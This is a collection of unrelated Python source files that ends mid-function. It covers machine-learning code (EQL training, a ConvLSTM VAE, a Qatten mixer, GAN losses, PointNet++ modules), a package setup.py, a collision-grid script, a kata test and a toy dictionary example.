print("Epoch %d\tError: %g\tCorrelation: %f" % (i, error_i, r))
weights_d = sess.run(prop_d_masked.get_weights())
expr_d = pretty_print.network(weights_d, primitive_funcs, ["d", "v", "z", 1])
print(expr_d)
weights_v = sess.run(prop_v_masked.get_weights())
expr_v = pretty_print.network(weights_v, primitive_funcs, ["d", "v", "z", 1])
print(expr_v)
# Save results
results = {
"summary_step": summary_step,
"learning_rate": learning_rate,
"n_epochs1": n_epochs1,
"n_epochs2": n_epochs2,
"reg_weight": reg_weight,
"timesteps": timesteps,
"timesteps0": timesteps0,
"weights_d": weights_d,
"weights_v": weights_v,
"loss_plot": loss_list,
"error_plot": error_list,
"reg_plot": reg_list,
"expr_d": expr_d,
"expr_v": expr_v
}
trial_dir = helpers.get_trial_path(results_dir) # Get directory in which to save trial results
tf.saved_model.simple_save(sess, trial_dir,
inputs={"x": x_input, "y0": y0_input, "training": training},
outputs={"z": z, "y": prop_output})
# Save a summary of the parameters and results
with open(os.path.join(trial_dir, 'summary.pickle'), "wb+") as f:
pickle.dump(results, f)
with open(os.path.join(results_dir, 'eq_summary.txt'), 'a') as f:
f.write(str(expr_d) + "\n")
f.write(str(expr_v) + "\n")
f.write("Error: %f\n\n" % error_list[-1])
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Train the EQL network on simple harmonic oscillator (SHO) task.")
parser.add_argument("--results-dir", type=str, default='results/sho/test')
parser.add_argument("--reg-weight", type=float, default=2e-4, help='Regularization weight, lambda')
parser.add_argument('--learning-rate', type=float, default=1e-2, help='Base learning rate for training')
parser.add_argument('--batch-size', type=int, default=128)
parser.add_argument("--n-epochs1", type=int, default=2001, help="Number of epochs to train in 1st stage")
parser.add_argument("--n-epochs2", type=int, default=5001, help="Number of epochs to train in 2nd stage")
parser.add_argument("--n-epochs3", type=int, default=5001, help="Number of epochs to train in 3rd stage")
parser.add_argument("--timesteps", type=int, default=25, help="Number of time steps to predict")
parser.add_argument('--trials', type=int, default=1, help="Number of trials to train.")
args = parser.parse_args()
kwargs = vars(args)
print(kwargs)
if not os.path.exists(kwargs['results_dir']):
os.makedirs(kwargs['results_dir'])
meta = open(os.path.join(kwargs['results_dir'], 'args.txt'), 'a')
import json
meta.write(json.dumps(kwargs))
meta.close()
main(**kwargs)
|
55697
|
from setuptools import setup, find_packages
from os import path
import re
def read_file(file_name: str) -> str:
here = path.abspath(path.dirname(__file__))
with open(path.join(here, file_name), encoding="utf-8") as f:
return f.read()
long_description = read_file("README.md")
version = re.sub(r"\s+", "", read_file("version.txt"))
setup(
name="signal-ocean",
version=version,
description="Access Signal Ocean Platform data using Python.",
long_description=long_description,
long_description_content_type="text/markdown",
author="Signal Ocean Developers",
author_email="<EMAIL>",
license="Apache 2.0",
url="https://apis.signalocean.com/",
packages=find_packages(exclude=["tests", "tests.*"]),
python_requires=">=3.7",
install_requires=[
"requests>=2.23.0,<3",
"python-dateutil>=2.8.1,<3",
"pandas>=1.0.3,<2",
],
classifiers=[
"Development Status :: 4 - Beta",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"License :: OSI Approved :: Apache Software License",
],
project_urls={
"The Signal Group": "https://www.thesignalgroup.com/",
"Signal Ocean": "https://www.signalocean.com/",
"The Signal Ocean Platform": "https://app.signalocean.com",
},
)
|
55713
|
import torch
import torch.utils.data
from torch import nn
from torch.nn import functional as F
from rlkit.pythonplusplus import identity
from rlkit.torch import pytorch_util as ptu
import numpy as np
from rlkit.torch.conv_networks import CNN, DCNN
from rlkit.torch.vae.vae_base import GaussianLatentVAE
imsize48_default_architecture = dict(
conv_args=dict( # conv layers
kernel_sizes=[5, 3, 3],
n_channels=[16, 32, 64],
strides=[3, 2, 2],
output_size=6,
),
conv_kwargs=dict(
hidden_sizes=[], # linear layers after conv
batch_norm_conv=False,
batch_norm_fc=False,
),
LSTM_args=dict(
input_size=6,
hidden_size=128,
),
LSTM_kwargs=dict(
num_layers=2,
),
deconv_args=dict(
hidden_sizes=[],
deconv_input_width=3,
deconv_input_height=3,
deconv_input_channels=64,
deconv_output_kernel_size=6,
deconv_output_strides=3,
deconv_output_channels=3,
kernel_sizes=[3, 3],
n_channels=[32, 16],
strides=[2, 2],
),
deconv_kwargs=dict(
batch_norm_deconv=False,
batch_norm_fc=False,
)
)
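# Shape check (a sketch derived from the numbers above, assuming the zero-padding
# convolutions that ConvLSTM2 configures below): 48 -> floor((48-5)/3)+1 = 15
# -> floor((15-3)/2)+1 = 7 -> floor((7-3)/2)+1 = 3, so the conv stack ends at a
# 3x3x64 feature map, which is why deconv_input_width/height/channels are 3, 3 and 64.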
class ConvLSTM2(nn.Module):
def __init__(
self,
representation_size,
architecture,
encoder_class=CNN,
decoder_class=DCNN,
decoder_output_activation=identity,
decoder_distribution='gaussian_identity_variance',
input_channels=3,
imsize=48,
init_w=1e-3,
min_variance=1e-3,
hidden_init=ptu.fanin_init,
detach_vae_output=True,
):
super(ConvLSTM2, self).__init__()
self.representation_size = representation_size
# record the empirical statistics of latents, when not sample from true prior, sample from them.
self.dist_mu = np.zeros(self.representation_size)
self.dist_std = np.ones(self.representation_size)
if min_variance is None:
self.log_min_variance = None
else:
self.log_min_variance = float(np.log(min_variance))
self.input_channels = input_channels
self.imsize = imsize
self.imlength = self.imsize * self.imsize * self.input_channels
self.detach_vae_output = detach_vae_output
conv_args, conv_kwargs, deconv_args, deconv_kwargs = \
architecture['conv_args'], architecture['conv_kwargs'], \
architecture['deconv_args'], architecture['deconv_kwargs']
self.encoder = encoder_class(
**conv_args,
paddings=np.zeros(len(conv_args['kernel_sizes']), dtype=np.int64),
input_height=self.imsize,
input_width=self.imsize,
input_channels=self.input_channels,
init_w=init_w,
hidden_init=hidden_init,
**conv_kwargs)
self.lstm_args, self.lstm_kwargs = architecture['LSTM_args'], architecture['LSTM_kwargs']
self.lstm = nn.LSTM(**self.lstm_args, **self.lstm_kwargs)
self.lstm_num_layers = self.lstm_kwargs['num_layers']
self.lstm_hidden_size = self.lstm_args['hidden_size']
assert representation_size == self.lstm_args['input_size'], "lstm input is vae latent, \
so lstm input size should be equal to representation_size!"
self.vae_fc1 = nn.Linear(conv_args['output_size'], representation_size)
self.vae_fc2 = nn.Linear(conv_args['output_size'], representation_size)
self.vae_fc1.weight.data.uniform_(-init_w, init_w)
self.vae_fc1.bias.data.uniform_(-init_w, init_w)
self.vae_fc2.weight.data.uniform_(-init_w, init_w)
self.vae_fc2.bias.data.uniform_(-init_w, init_w)
self.lstm_fc = nn.Linear(self.lstm_hidden_size, representation_size)
self.lstm_fc.weight.data.uniform_(-init_w, init_w)
self.lstm_fc.bias.data.uniform_(-init_w, init_w)
self.decoder = decoder_class(
**deconv_args,
fc_input_size=representation_size,
init_w=init_w,
output_activation=decoder_output_activation,
paddings=np.zeros(len(deconv_args['kernel_sizes']), dtype=np.int64),
hidden_init=hidden_init,
**deconv_kwargs)
self.decoder_distribution = decoder_distribution
def from_vae_latents_to_lstm_latents(self, latents, lstm_hidden=None):
batch_size, feature_size = latents.shape
# print(latents.shape)
lstm_input = latents
lstm_input = lstm_input.view((1, batch_size, -1))
if lstm_hidden is None:
lstm_hidden = (ptu.zeros(self.lstm_num_layers, batch_size, self.lstm_hidden_size), \
ptu.zeros(self.lstm_num_layers, batch_size, self.lstm_hidden_size))
h, hidden = self.lstm(lstm_input, lstm_hidden) # [seq_len, batch_size, lstm_hidden_size]
lstm_latent = self.lstm_fc(h)
lstm_latent = lstm_latent.view((batch_size, -1))
return lstm_latent
def encode(self, input, lstm_hidden=None, return_hidden=False, return_vae_latent=False):
'''
input: [seq_len x batch x flatten_img_dim] of flattened images
lstm_hidden: [lstm_layers x batch x lstm_hidden_size]
mark: change depends on how latent distribution parameters are used
'''
seq_len, batch_size, feature_size = input.shape
# print("in lstm encode: ", seq_len, batch_size, feature_size)
input = input.reshape((-1, feature_size))
feature = self.encoder(input) # [seq_len x batch x conv_output_size]
vae_mu = self.vae_fc1(feature)
if self.log_min_variance is None:
vae_logvar = self.vae_fc2(feature)
else:
vae_logvar = self.log_min_variance + torch.abs(self.vae_fc2(feature))
# lstm_input = self.rsample((vae_mu, vae_logvar))
# if self.detach_vae_output:
# lstm_input = lstm_input.detach()
if self.detach_vae_output:
lstm_input = vae_mu.detach().clone()
else:
lstm_input = vae_mu
lstm_input = lstm_input.view((seq_len, batch_size, -1))
# if self.detach_vae_output:
# lstm_input = lstm_input.detach()
if lstm_hidden is None:
lstm_hidden = (ptu.zeros(self.lstm_num_layers, batch_size, self.lstm_hidden_size), \
ptu.zeros(self.lstm_num_layers, batch_size, self.lstm_hidden_size))
h, hidden = self.lstm(lstm_input, lstm_hidden) # [seq_len, batch_size, lstm_hidden_size]
lstm_latent = self.lstm_fc(h)
ret = (lstm_latent, ptu.ones_like(lstm_latent))
if return_vae_latent:
ret += (vae_mu, vae_logvar)
if return_hidden:
return ret, hidden
return ret #, lstm_input # [seq_len, batch_size, representation_size]
def forward(self, input, lstm_hidden=None, return_hidden=False):
"""
:param input:
:return: reconstructed input, obs_distribution_params, latent_distribution_params
mark: change to return the feature latents and the lstm latents
"""
if return_hidden:
latent_distribution_params, hidden = self.encode(input, lstm_hidden, return_hidden=True, return_vae_latent=True) # seq_len, batch_size, representation_size
else:
latent_distribution_params = self.encode(input, lstm_hidden, return_hidden=False, return_vae_latent=True)
vae_latent_distribution_params = latent_distribution_params[2:]
lstm_latent_encodings = latent_distribution_params[0]
vae_latents = self.reparameterize(vae_latent_distribution_params)
reconstructions, obs_distribution_params = self.decode(vae_latents) # [seq_len * batch_size, representation_size]
if return_hidden:
return reconstructions, obs_distribution_params, vae_latent_distribution_params, lstm_latent_encodings, hidden
return reconstructions, obs_distribution_params, vae_latent_distribution_params, lstm_latent_encodings
def reparameterize(self, latent_distribution_params):
if self.training:
return self.rsample(latent_distribution_params)
else:
return latent_distribution_params[0]
def kl_divergence(self, latent_distribution_params):
mu, logvar = latent_distribution_params
mu = mu.view((-1, self.representation_size)) # fold the possible seq_len dim
logvar = logvar.view((-1, self.representation_size))
return - 0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp(), dim=1).mean()
def get_encoding_from_latent_distribution_params(self, latent_distribution_params):
return latent_distribution_params[0].cpu()
def rsample(self, latent_distribution_params):
mu, logvar = latent_distribution_params
stds = (0.5 * logvar).exp()
epsilon = ptu.randn(*mu.size())
latents = epsilon * stds + mu
return latents
def decode(self, latents):
decoded = self.decoder(latents).view(-1,
self.imsize * self.imsize * self.input_channels)
if self.decoder_distribution == 'bernoulli':
return decoded, [decoded]
elif self.decoder_distribution == 'gaussian_identity_variance':
return torch.clamp(decoded, 0, 1), [torch.clamp(decoded, 0, 1),
torch.ones_like(decoded)]
else:
raise NotImplementedError('Distribution {} not supported'.format(
self.decoder_distribution))
def logprob(self, inputs, obs_distribution_params):
seq_len, batch_size, feature_size = inputs.shape
inputs = inputs.view((-1, feature_size))
if self.decoder_distribution == 'bernoulli':
inputs = inputs.narrow(start=0, length=self.imlength,
dim=1).contiguous().view(-1, self.imlength)
# obs_distribution_params[0] = obs_distribution_params[0].view((-1, feature_size))
log_prob = - F.binary_cross_entropy(
obs_distribution_params[0],
inputs,
reduction='elementwise_mean'
) * self.imlength
return log_prob
if self.decoder_distribution == 'gaussian_identity_variance':
# obs_distribution_params[0] = obs_distribution_params[0].view((-1, feature_size))
inputs = inputs.narrow(start=0, length=self.imlength,
dim=1).contiguous().view(-1, self.imlength)
log_prob = -1 * F.mse_loss(inputs, obs_distribution_params[0],
reduction='elementwise_mean')
return log_prob
else:
raise NotImplementedError('Distribution {} not supported'.format(
self.decoder_distribution))
def init_hidden(self, batch_size=1):
lstm_hidden = (ptu.zeros(self.lstm_num_layers, batch_size, self.lstm_hidden_size), \
ptu.zeros(self.lstm_num_layers, batch_size, self.lstm_hidden_size))
return lstm_hidden
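# Usage sketch (hypothetical, not part of the original file): with
# imsize48_default_architecture the assert in __init__ forces representation_size == 6
# (the LSTM input_size), and encode() expects a float tensor of shape
# [seq_len, batch, 48*48*3 = 6912]. It returns (lstm_latent, ones_like(lstm_latent)),
# plus (vae_mu, vae_logvar) when return_vae_latent=True, where lstm_latent has shape
# [seq_len, batch, representation_size].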
|
55715
|
Friend1 = {"First_name": "Anita", "Last_name": "Sanchez", "Age": 21, "City": "Saltillo"}
Friend2 = {"First_name": "Andrea", "Last_name": "<NAME>", "Age": 21, "City": "Monclova"}
Friend3 = {"First_name": "Jorge", "Last_name": "Sanchez", "Age":20, "City": "Saltillo"}
amigos = [Friend1, Friend2, Friend3]
for amigo in amigos:
    print(amigo)
|
55729
|
import numpy as np
import torch as th
import torch.nn as nn
from rls.nn.mlps import MLP
from rls.nn.represent_nets import RepresentationNetwork
class QattenMixer(nn.Module):
def __init__(self,
n_agents: int,
state_spec,
rep_net_params,
agent_own_state_size: bool,
query_hidden_units: int,
query_embed_dim: int,
key_embed_dim: int,
head_hidden_units: int,
n_attention_head: int,
constrant_hidden_units: int,
is_weighted: bool = True):
super().__init__()
self.n_agents = n_agents
self.rep_net = RepresentationNetwork(obs_spec=state_spec,
rep_net_params=rep_net_params)
self.u_dim = agent_own_state_size # TODO: implement this
self.query_embed_dim = query_embed_dim
self.key_embed_dim = key_embed_dim
self.n_attention_head = n_attention_head
self.is_weighted = is_weighted
self.query_embedding_layers = nn.ModuleList()
self.key_embedding_layers = nn.ModuleList()
for i in range(self.n_attention_head):
self.query_embedding_layers.append(MLP(input_dim=self.rep_net.h_dim, hidden_units=query_hidden_units,
layer='linear', act_fn='relu', output_shape=query_embed_dim))
self.key_embedding_layers.append(
nn.Linear(self.u_dim, self.key_embed_dim))
self.scaled_product_value = np.sqrt(self.query_embed_dim)
self.head_embedding_layer = MLP(input_dim=self.rep_net.h_dim, hidden_units=head_hidden_units,
layer='linear', act_fn='relu', output_shape=n_attention_head)
self.constrant_value_layer = MLP(input_dim=self.rep_net.h_dim, hidden_units=constrant_hidden_units,
layer='linear', act_fn='relu', output_shape=1)
def forward(self, q_values, state, **kwargs):
"""
params:
q_values: [T, B, 1, N]
state: [T, B, *]
"""
time_step = q_values.shape[0] # T
batch_size = q_values.shape[1] # B
# state: [T, B, *]
state_feat, _ = self.rep_net(state, **kwargs) # [T, B, *]
us = self._get_us(state_feat) # [T, B, N, *]
q_lambda_list = []
for i in range(self.n_attention_head):
state_embedding = self.query_embedding_layers[i](
state_feat) # [T, B, *]
u_embedding = self.key_embedding_layers[i](us) # [T, B, N, *]
state_embedding = state_embedding.unsqueeze(-2) # [T, B, 1, *]
u_embedding = u_embedding.swapaxes(-1, -2) # [T, B, *, N]
raw_lambda = (state_embedding @ u_embedding) / \
self.scaled_product_value # [T, B, 1, N]
q_lambda = raw_lambda.softmax(dim=-1) # [T, B, 1, N]
q_lambda_list.append(q_lambda) # H * [T, B, 1, N]
q_lambda_list = th.cat(q_lambda_list, dim=-2) # [T, B, H, N]
q_lambda_list = q_lambda_list.swapaxes(-1, -2) # [T, B, N, H]
q_h = q_values @ q_lambda_list # [T, B, 1, H]
if self.is_weighted:
# shape: [-1, n_attention_head, 1]
w_h = th.abs(self.head_embedding_layer(state_feat)) # [T, B, H]
w_h = w_h.unsqueeze(-1) # [T, B, H, 1]
sum_q_h = q_h @ w_h # [T, B, 1, 1]
sum_q_h = sum_q_h.view(time_step, batch_size, 1) # [T, B, 1]
else:
sum_q_h = q_h.sum(-1) # [T, B, 1]
c = self.constrant_value_layer(state_feat) # [T, B, 1]
q_tot = sum_q_h + c # [T, B, 1]
return q_tot
def _get_us(self, state_feat):
time_step = state_feat.shape[0] # T
batch_size = state_feat.shape[1] # B
agent_own_state_size = self.u_dim
with th.no_grad():
us = state_feat[:, :, :agent_own_state_size * self.n_agents].view(
time_step, batch_size, self.n_agents, agent_own_state_size) # [T, B, N, *]
return us
|
55764
|
import unittest
from katas.kyu_6.which_are_in import in_array
class InArrayTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(in_array(
['live', 'arp', 'strong'],
['lively', 'alive', 'harp', 'sharp', 'armstrong']),
['arp', 'live', 'strong'])
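# A minimal sketch (hypothetical; the real implementation lives in
# katas.kyu_6.which_are_in and may differ) of an in_array that satisfies the
# expectation above: return the sorted, de-duplicated entries of array1 that occur
# as substrings of at least one entry of array2.
def _in_array_sketch(array1, array2):
    return sorted({a for a in array1 if any(a in b for b in array2)})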
|
55780
|
import numpy as np
import fcl
import torch
# R = np.array([[0.0, -1.0, 0.0],
# [1.0, 0.0, 0.0],
# [0.0, 0.0, 1.0]])
R = np.array([[1.0, 0.0, 0.0],
[0.0, 1.0, 0.0],
[0.0, 0.0, 1.0]])
T = np.array([1.0, 1.865, 0])
g1 = fcl.Box(1,2,3)
t1 = fcl.Transform()
o1 = fcl.CollisionObject(g1, t1)
# g2 = fcl.Cone(1,3)
g2 = fcl.Cylinder(0.01, 1000)
t2 = fcl.Transform()
o2 = fcl.CollisionObject(g2, t2)
# request = fcl.DistanceRequest(gjk_solver_type=fcl.GJKSolverType.GST_INDEP)
# result = fcl.DistanceResult()
request = fcl.CollisionRequest(enable_contact=True)
result = fcl.CollisionResult()
# ret = fcl.distance(o1, o2, request, result)
# ret = fcl.collide(o1, o2, request, result)
size = 50, 50
yy, xx = torch.meshgrid(torch.linspace(-5, 5, size[0]), torch.linspace(-5, 5, size[1]))
grid_points = torch.stack([xx, yy], axis=2).reshape((-1, 2))
grid_labels = torch.zeros_like(grid_points)[:, 0]
for i, (x, y) in enumerate(grid_points):
print(x, y)
    o2.setTranslation([float(x), float(y), 0.0])  # move the thin cylinder to the current grid point
    result = fcl.CollisionResult()  # fresh result per query so earlier contacts do not carry over
    ret = fcl.collide(o1, o2, request, result)
grid_labels[i] = result.is_collision
print(result.is_collision)
import matplotlib.pyplot as plt
plt.scatter(grid_points[grid_labels==True, 0], grid_points[grid_labels==True, 1])
plt.show()
# print(ret, result.contacts[0].penetration_depth)
|
55784
|
import torch
import torch.nn as nn
from torch import autograd
from Configs import Global_Config
def calc_Dw_loss(probs: torch.Tensor, label: int):
labels = torch.full((probs.size(0),), label, dtype=torch.float, device=Global_Config.device)
criterion = nn.BCELoss()
adversarial_loss = criterion(probs, labels)
return adversarial_loss
def R1_regulazation(r1_coefficient, probs, ws):
return (r1_coefficient / 2) * compute_grad2(probs, ws).mean()
def compute_grad2(probs, w_input):
batch_size = w_input.size(0)
grad_dout = autograd.grad(
outputs=probs.sum(), inputs=w_input,
create_graph=True, retain_graph=True, only_inputs=True
)[0]
grad_dout2 = grad_dout.pow(2)
reg = grad_dout2.view(batch_size, -1).sum(1)
return reg
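# Usage sketch (hypothetical names; assumes the probs/ws tensors live on
# Global_Config.device): ws must require gradients for compute_grad2's
# autograd.grad call, and probs must be sigmoid outputs in (0, 1) for BCELoss, e.g.
#   ws = w_batch.detach().requires_grad_(True)
#   probs = discriminator(ws).squeeze(1)
#   d_loss = calc_Dw_loss(probs, 1) + R1_regulazation(10.0, probs, ws)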
|
55786
|
from typing import List
import torch
import torch.nn as nn
import torch.nn.functional as F
from . import pointnet2_utils
class StackSAModuleMSG(nn.Module):
def __init__(self, *, radii: List[float], nsamples: List[int], mlps: List[List[int]],
use_xyz: bool = True, pool_method='max_pool'):
"""
Args:
radii: list of float, list of radii to group with
nsamples: list of int, number of samples in each ball query
mlps: list of list of int, spec of the pointnet before the global pooling for each scale
use_xyz:
pool_method: max_pool / avg_pool
"""
super().__init__()
assert len(radii) == len(nsamples) == len(mlps)
self.groupers = nn.ModuleList()
self.mlps = nn.ModuleList()
for i in range(len(radii)):
radius = radii[i]
nsample = nsamples[i]
self.groupers.append(pointnet2_utils.QueryAndGroup(radius, nsample, use_xyz=use_xyz))
mlp_spec = mlps[i]
if use_xyz:
mlp_spec[0] += 3
shared_mlps = []
for k in range(len(mlp_spec) - 1):
shared_mlps.extend([
nn.Conv2d(mlp_spec[k], mlp_spec[k + 1], kernel_size=1, bias=False),
nn.BatchNorm2d(mlp_spec[k + 1]),
nn.ReLU()
])
self.mlps.append(nn.Sequential(*shared_mlps))
self.pool_method = pool_method
self.init_weights()
def init_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight)
if m.bias is not None:
nn.init.constant_(m.bias, 0)
if isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1.0)
nn.init.constant_(m.bias, 0)
def forward(self, xyz, xyz_batch_cnt, new_xyz, new_xyz_batch_cnt, features=None, empty_voxel_set_zeros=True):
"""
:param xyz: (N1 + N2 ..., 3) tensor of the xyz coordinates of the features
:param xyz_batch_cnt: (batch_size), [N1, N2, ...]
:param new_xyz: (M1 + M2 ..., 3)
:param new_xyz_batch_cnt: (batch_size), [M1, M2, ...]
:param features: (N1 + N2 ..., C) tensor of the descriptors of the the features
:return:
new_xyz: (M1 + M2 ..., 3) tensor of the new features' xyz
new_features: (M1 + M2 ..., \sum_k(mlps[k][-1])) tensor of the new_features descriptors
"""
new_features_list = []
for k in range(len(self.groupers)):
new_features, ball_idxs = self.groupers[k](
xyz, xyz_batch_cnt, new_xyz, new_xyz_batch_cnt, features
) # (M1 + M2, C, nsample)
new_features = new_features.permute(1, 0, 2).unsqueeze(dim=0) # (1, C, M1 + M2 ..., nsample)
new_features = self.mlps[k](new_features) # (1, C, M1 + M2 ..., nsample)
if self.pool_method == 'max_pool':
new_features = F.max_pool2d(
new_features, kernel_size=[1, new_features.size(3)]
).squeeze(dim=-1) # (1, C, M1 + M2 ...)
elif self.pool_method == 'avg_pool':
new_features = F.avg_pool2d(
new_features, kernel_size=[1, new_features.size(3)]
).squeeze(dim=-1) # (1, C, M1 + M2 ...)
else:
raise NotImplementedError
new_features = new_features.squeeze(dim=0).permute(1, 0) # (M1 + M2 ..., C)
new_features_list.append(new_features)
new_features = torch.cat(new_features_list, dim=1) # (M1 + M2 ..., C)
return new_xyz, new_features
class StackSAModulePyramid(nn.Module):
def __init__(self, *, mlps: List[List[int]], nsamples, use_xyz: bool = True, pool_method='max_pool'):
"""
Args:
nsamples: list of int, number of samples in each ball query
mlps: list of list of int, spec of the pointnet before the global pooling for each scale
use_xyz:
pool_method: max_pool / avg_pool
"""
super().__init__()
self.num_pyramid_levels = len(nsamples)
assert len(nsamples) == len(mlps)
self.groupers = nn.ModuleList()
self.mlps = nn.ModuleList()
for i in range(self.num_pyramid_levels):
nsample = nsamples[i]
self.groupers.append(pointnet2_utils.QueryAndGroupPyramid(nsample, use_xyz=use_xyz))
mlp_spec = mlps[i]
if use_xyz:
mlp_spec[0] += 3
shared_mlps = []
for k in range(len(mlp_spec) - 1):
shared_mlps.extend([
nn.Conv2d(mlp_spec[k], mlp_spec[k + 1], kernel_size=1, bias=False),
nn.BatchNorm2d(mlp_spec[k + 1]),
nn.ReLU()
])
self.mlps.append(nn.Sequential(*shared_mlps))
self.pool_method = pool_method
self.init_weights()
def init_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight)
if m.bias is not None:
nn.init.constant_(m.bias, 0)
if isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1.0)
nn.init.constant_(m.bias, 0)
def forward(self, xyz, xyz_batch_cnt, new_xyz_list, new_xyz_r_list, new_xyz_batch_cnt_list, features=None, batch_size=None, num_rois=None):
"""
:param xyz: (N1 + N2 ..., 3) tensor of the xyz coordinates of the features
:param xyz_batch_cnt: (batch_size), [N1, N2, ...]
:param new_xyz_list: [(B, N x grid_size^3, 3)]
:param new_xyz_r_list: [(B, N x grid_size^3, 1)]
:param new_xyz_batch_cnt_list: (batch_size)
:param features: (N1 + N2 ..., C) tensor of the descriptors of the the features
:return:
new_xyz: (M1 + M2 ..., 3) tensor of the new features' xyz
new_features: (M1 + M2 ..., \sum_k(mlps[k][-1])) tensor of the new_features descriptors
"""
new_features_list = []
for i in range(self.num_pyramid_levels):
new_xyz = new_xyz_list[i]
new_xyz_r = new_xyz_r_list[i]
new_xyz_batch_cnt = new_xyz_batch_cnt_list[i]
new_xyz = new_xyz.view(-1, 3).contiguous()
new_xyz_r = new_xyz_r.view(-1, 1).contiguous()
new_features, _ = self.groupers[i](
xyz, xyz_batch_cnt, new_xyz, new_xyz_r, new_xyz_batch_cnt, features
)
new_features = new_features.permute(1, 0, 2).unsqueeze(dim=0) # (1, C, M1 + M2 ..., nsample)
new_features = self.mlps[i](new_features) # (1, C, M1 + M2 ..., nsample)
new_features = F.max_pool2d(
new_features, kernel_size=[1, new_features.size(3)]
).squeeze(dim=-1) # (1, C, M1 + M2 ...)
new_features = new_features.squeeze(dim=0).permute(1, 0) # (M1 + M2 ..., C)
num_features = new_features.shape[1]
new_features = new_features.view(batch_size * num_rois, -1, num_features)
new_features_list.append(new_features)
new_features = torch.cat(new_features_list, dim=1) # (B x N, \sum(grid_size^3), C)
return new_features
class StackSAModuleMSGDeform(nn.Module):
"""
Set abstraction with single radius prediction for each roi
"""
def __init__(self, *, temperatures: List[float], div_coefs: List[float], radii: List[float],
nsamples: List[int], predict_nsamples: List[int],
mlps: List[List[int]], pmlps: List[List[int]], pfcs: List[List[int]],
grid_size: int, use_xyz: bool = True):
"""
:param radii: list of float, list of radii to group with
:param nsamples: list of int, number of samples in each ball query
:param mlps: list of list of int, spec of the pointnet before the global pooling for each scale
:param use_xyz:
:param pool_method: max_pool / avg_pool
"""
super().__init__()
assert len(radii) == len(nsamples) == len(mlps)
self.grid_size = grid_size
self.MIN_R = 0.01
self.radii_list = radii
self.div_coef_list = div_coefs
self.norm_groupers = nn.ModuleList()
self.deform_groupers = nn.ModuleList()
self.feat_mlps = nn.ModuleList()
self.predict_mlps = nn.ModuleList()
self.predict_fcs = nn.ModuleList()
for i in range(len(radii)):
radius = radii[i]
nsample = nsamples[i]
predict_nsample = predict_nsamples[i]
temperature = temperatures[i]
self.norm_groupers.append(
pointnet2_utils.QueryAndGroup(radius, predict_nsample, use_xyz=use_xyz)
)
self.deform_groupers.append(
pointnet2_utils.QueryAndGroupDeform(temperature, nsample, use_xyz=use_xyz)
)
mlp_spec = mlps[i]
predict_mlp_spec = pmlps[i]
if use_xyz:
mlp_spec[0] += 3
predict_mlp_spec[0] += 3
self.feat_mlps.append(self._make_mlp_layer(mlp_spec))
self.predict_mlps.append(self._make_mlp_layer(predict_mlp_spec))
fc_spec = pfcs[i]
self.predict_fcs.append(self._make_fc_layer(fc_spec))
self.init_weights()
def init_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight)
if m.bias is not None:
nn.init.constant_(m.bias, 0)
if isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1.0)
nn.init.constant_(m.bias, 0)
if isinstance(m, nn.Linear):
nn.init.kaiming_normal_(m.weight)
if m.bias is not None:
nn.init.constant_(m.bias, 0)
def _make_mlp_layer(self, mlp_spec):
mlps = []
for i in range(len(mlp_spec) - 1):
mlps.extend([
nn.Conv2d(mlp_spec[i], mlp_spec[i + 1], kernel_size=1, bias=False),
nn.BatchNorm2d(mlp_spec[i + 1]),
nn.ReLU()
])
return nn.Sequential(*mlps)
def _make_fc_layer(self, fc_spec):
assert len(fc_spec) == 2
return nn.Linear(fc_spec[0], fc_spec[1], bias = True)
def forward(self, xyz, xyz_batch_cnt, rois, roi_features, features=None, temperature_decay=None):
"""
:param xyz: (N1 + N2 ..., 3) tensor of the xyz coordinates of the features
:param xyz_batch_cnt: (batch_size), [N1, N2, ...]
:param rois: (B, num_rois, grid_size^3, 3) roi grid points
:param roi_features: (B, num_rois, C) roi features
:param features: (N1 + N2 ..., C) tensor of the descriptors of the the features
:return:
new_xyz: (M1 + M2 ..., 3) tensor of the new features' xyz
new_features: (M1 + M2 ..., \sum_k(mlps[k][-1])) tensor of the new_features descriptors
"""
batch_size = rois.shape[0]
num_rois = rois.shape[1]
new_xyz = rois.view(batch_size, -1, 3).contiguous()
        new_xyz_batch_cnt = new_xyz.new_full((batch_size,), new_xyz.shape[1]).int()
new_xyz = new_xyz.view(-1, 3).contiguous()
new_features_list = []
for k in range(len(self.norm_groupers)):
# radius prediction
predicted_features, ball_idxs = self.norm_groupers[k](
xyz, xyz_batch_cnt, new_xyz, new_xyz_batch_cnt, features
) # (M, C, nsample)
predicted_features = predicted_features.permute(1, 0, 2).unsqueeze(dim=0) # (1, C, M, nsample)
predicted_features = self.predict_mlps[k](predicted_features) # (1, C, M, nsample)
predicted_features = F.max_pool2d(
predicted_features, kernel_size=[1, predicted_features.size(3)]
).squeeze(dim=-1) # (1, C, M)
# M = batch_size * num_rois * grid_size^3
            predicted_features = predicted_features.squeeze(0).permute(1, 0).contiguous()  # (M, C)
num_predicted_features = predicted_features.shape[1]
predicted_features = predicted_features.view(batch_size, num_rois, self.grid_size ** 3, num_predicted_features)
predicted_features = predicted_features.view(batch_size, num_rois, -1).contiguous()
predicted_residual_r = self.predict_fcs[k](torch.cat([predicted_features, roi_features], dim = 2)) # (batch_size, num_rois, C -> 1)
new_xyz_r = predicted_residual_r / self.div_coef_list[k] + self.radii_list[k]
# constrain predicted radius above MIN_R
new_xyz_r = torch.clamp(new_xyz_r, min = self.MIN_R)
new_xyz_r = new_xyz_r.unsqueeze(2).repeat(1, 1, self.grid_size ** 3, 1) # (batch_size, num_rois, grid_size^3, 1)
new_xyz_r = new_xyz_r.view(-1, 1).contiguous()
# feature extraction
# new_features (M, C, nsample) weights (M, nsample)
new_features, new_weights, ball_idxs = self.deform_groupers[k](
xyz, xyz_batch_cnt, new_xyz, new_xyz_r, new_xyz_batch_cnt, features, temperature_decay
)
new_features = new_features.permute(1, 0, 2).unsqueeze(dim=0) # (1, C, M, nsample)
